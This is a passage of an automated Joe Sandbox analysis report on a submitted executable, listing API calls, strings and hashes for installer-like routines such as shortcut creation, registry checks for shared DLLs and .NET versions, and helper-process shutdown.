                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInstance$FreeString
                                                                            • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                            • API String ID: 308859552-3936712486
                                                                            • Opcode ID: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                            • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                                            • Opcode Fuzzy Hash: 7d0cfd58331e70c95d7e52b395728c42337191576a3ec6130da080a3535e9fef
                                                                            • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                                            APIs
                                                                            • 74284C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                            • 74284C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                            • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                            • 74286180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                            • 7427A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                            • 74284C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                            • 7427A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$74284$7427Delete$74286180A480A570Stretch
                                                                            • String ID:
                                                                            • API String ID: 1630650915-0
                                                                            • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                            • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                            • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                            • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                            APIs
                                                                              • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                                            • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                                            • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                                            • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                            • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                            • API String ID: 971782779-3668018701
                                                                            • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                            • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                                            • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                            • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                                              • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                            • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                                            • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                                            Strings
                                                                            • , xrefs: 004548EA
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                                            • RegOpenKeyEx, xrefs: 004548FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$FormatMessageOpen
                                                                            • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                            • API String ID: 2812809588-1577016196
                                                                            • Opcode ID: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                                            • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                                            • Opcode Fuzzy Hash: 77e820d85456ec5b21a3348e7c864f635890ca9680278173730b6b5baa6068b5
                                                                            • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                                            APIs
                                                                              • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                                            Strings
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                                            • v4.0.30319, xrefs: 00459855
                                                                            • .NET Framework version %s not found, xrefs: 0045996D
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                                            • v2.0.50727, xrefs: 004598BF
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                                            • .NET Framework not found, xrefs: 00459981
                                                                            • v1.1.4322, xrefs: 00459926
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Close$Open
                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                            • API String ID: 2976201327-446240816
                                                                            • Opcode ID: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                                            • Instruction ID: 729b419896cd5506e065475e0ee5015c208a67e93f4f54458093df2d8724af3d
                                                                            • Opcode Fuzzy Hash: a27e16b2435ffffe3ed3affd436a97f5188f93bd827438211cc6c054a476643b
                                                                            • Instruction Fuzzy Hash: 0051A030A04145EBCB04DFA9C8A1BEE77B69B59305F54447FA841DB393D63D9E0E8B18
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                                            • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                                            • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                                            • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
                                                                            • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                                            Strings
                                                                            • Helper process exited., xrefs: 00458E29
                                                                            • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                                            • Helper isn't responding; killing it., xrefs: 00458DEB
                                                                            • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                                            • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                            • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                            • API String ID: 3355656108-1243109208
                                                                            • Opcode ID: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                            • Instruction ID: b06cb4cb11178ece3cea1db1bc2ca69ea432733d5239d7d0987fb8f0d427a68f
                                                                            • Opcode Fuzzy Hash: e1e6f1a428ddc606cbac7e5be58ccbeaead76fc5c320782193580adc03ed748c
                                                                            • Instruction Fuzzy Hash: D9216D706047009AD720E679C44275BB6E59F08709F04CC2FB999EB293DF78E8488B2A
                                                                            APIs
                                                                              • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                              • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                            Strings
                                                                            • RegCreateKeyEx, xrefs: 004545AF
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                                            • , xrefs: 0045459D
                                                                            • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateFormatMessageQueryValue
                                                                            • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                            • API String ID: 2481121983-1280779767
                                                                            • Opcode ID: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                            • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                                            • Opcode Fuzzy Hash: a579990beb4c9b51ec5b3fea0749880c5f06a70a884d2fa71269d98e88c3cf61
                                                                            • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                                            APIs
                                                                              • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                              • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                                            • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                                            • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                                            • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                              • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                            • 74285CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileWindow$CloseCreateHandle$74285AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                            • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                            • API String ID: 3614729947-2312673372
                                                                            • Opcode ID: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                            • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                                            • Opcode Fuzzy Hash: c09fb920bc7669bd65d78bc4791726942d010f86c1ff051557e4c77676e60077
                                                                            • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressCloseHandleModuleProc
                                                                            • String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                            • API String ID: 4190037839-1003587384
                                                                            • Opcode ID: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                            • Instruction ID: 6214d84d9e891aa165dd1588e79579c1e4a82babed7fc21810c195be89e1891e
                                                                            • Opcode Fuzzy Hash: 71ec1778410e517379c49e62a4abf791b893e005234a700e60dfa1d7d317b6f8
                                                                            • Instruction Fuzzy Hash: 65215230B10219ABCB10EAE7DC45A9E77A8EB04318FA04877A500E7281EB7CDE41CA5C
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 00462D68
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
                                                                            • GetWindowRect.USER32(?,00000000), ref: 00462DE2
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                            • API String ID: 2610873146-3407710046
                                                                            • Opcode ID: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                            • Instruction ID: 308e9426e96dcd15a0811dc773674cbbce9379ede84ac64ebea6e7762974983c
                                                                            • Opcode Fuzzy Hash: 07f038a1b45edca227de97dbc4e3a49cc5475e4390ab333f174a5f731d21d9c4
                                                                            • Instruction Fuzzy Hash: 8421A775701B046FD3019A64DD41F3B3395DB94714F08453AF944EB381E6B9EC018A9A
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0042F1A4
                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
                                                                            • GetWindowRect.USER32(?,00000000), ref: 0042F21E
                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                            • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                            • API String ID: 2610873146-3407710046
                                                                            • Opcode ID: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                            • Instruction ID: f96f766bc13e38d455a6b30724ea53c80225cfaaeacd9570d6dca051b777ffc7
                                                                            • Opcode Fuzzy Hash: fc179306045cef01cc7feea5ef12c7621bc9e212612d9656ab7fba5f67810d88
                                                                            • Instruction Fuzzy Hash: 3221D7797057149BD300D664ED81F3B33A4DB85B14F88457AF944DB381D679EC044BA9
                                                                            APIs
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02133858,00000000), ref: 00458FDD
                                                                            • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                            • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                            • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                            • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02133858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                            • String ID: CreateEvent$TransactNamedPipe
                                                                            • API String ID: 2182916169-3012584893
                                                                            • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                            • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                            • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                            • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                            • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
